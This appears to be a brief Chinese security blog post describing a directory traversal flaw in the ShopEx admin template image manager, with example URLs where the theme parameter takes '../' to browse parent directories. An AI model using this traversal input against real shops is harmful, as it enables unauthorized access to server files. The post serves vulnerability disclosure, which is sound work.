- A+
所属分类:Seay信息安全博客
显示不全请点击全屏阅读
ShopEx后台历遍目录 很蛋疼的
记得10年的是也有过的差不多的漏洞
主要是出在模板上
我们编辑目录之后得到URL
http://www.xxoo.com/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=
这里theme= 可以做../跳转
http://xxx.net/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../
跳到了上级目录
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡